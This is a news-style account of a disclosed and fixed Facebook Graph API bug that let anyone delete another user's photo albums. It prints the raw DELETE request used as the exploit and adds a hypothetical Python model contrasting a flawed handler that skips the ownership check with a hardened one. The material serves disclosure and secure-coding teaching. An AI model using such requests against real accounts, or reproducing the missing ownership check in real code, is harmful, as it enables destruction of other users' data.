Indian (Tamil Nadu) hacker Laxman Muthiyah discovered a bug that could delete any photo on Facebook, and he was rewarded $12500 by Facebook. The bug targeted Facebook's Graph API, which Laxman used to delete a photo from Facebook with a command.
I decided to try it with the Facebook for mobile access token because we can see a delete option for all photo albums in the Facebook mobile application, isn't it? Yeah, and it also uses the same Graph API. So I took an album id & Facebook for Android access token of mine and tried it.
Request:
DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>
Example:
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Laxman Muthiyah reported the vulnerability to Facebook, and Facebook wrote back saying that the bug had been fixed and offering him $12500.
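The request above worked with a token belonging to someone other than the album's owner. The following is an added example, not code from the original post or from Facebook: a simplified Python model that assumes the flaw was a missing ownership check, contrasting a delete handler that checks only the calling app with one that also checks who owns the album. Every name and value in it (`Token`, `ALBUMS`, `APPS_WITH_DELETE`, the handler functions) is hypothetical and constructed for illustration.

```python
# Simplified model of object-level authorization on a DELETE endpoint.
# Hypothetical names and constructed data; not Facebook's implementation.
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    user_id: str  # user the access token was issued to
    app: str      # client app the token was issued for


# Constructed sample data: album id -> owner user id
ALBUMS = {"album-1001": "alice", "album-2002": "bob"}
# Assumption: only some apps' tokens may use the delete feature at all.
APPS_WITH_DELETE = {"mobile_app"}


def delete_album_app_check_only(albums, token, album_id):
    """Flawed: authorizes on the app's capability, never compares the owner."""
    if token.app not in APPS_WITH_DELETE:
        return 403
    if album_id not in albums:
        return 404
    del albums[album_id]
    return 200


def delete_album_owner_checked(albums, token, album_id):
    """Hardened: the token's user must own the album, whatever the app."""
    if token.app not in APPS_WITH_DELETE:
        return 403
    owner = albums.get(album_id)
    # Same 404 for "missing" and "not yours", so album ids cannot be probed.
    if owner is None or owner != token.user_id:
        return 404
    del albums[album_id]
    return 200


def demo():
    """Run both handlers with bob's token against alice's album."""
    bob = Token(user_id="bob", app="mobile_app")
    flawed, fixed = dict(ALBUMS), dict(ALBUMS)
    return {
        "flawed_status": delete_album_app_check_only(flawed, bob, "album-1001"),
        "flawed_album_left": "album-1001" in flawed,
        "fixed_status": delete_album_owner_checked(fixed, bob, "album-1001"),
        "fixed_album_left": "album-1001" in fixed,
        "owner_status": delete_album_owner_checked(fixed, bob, "album-2002"),
    }
```
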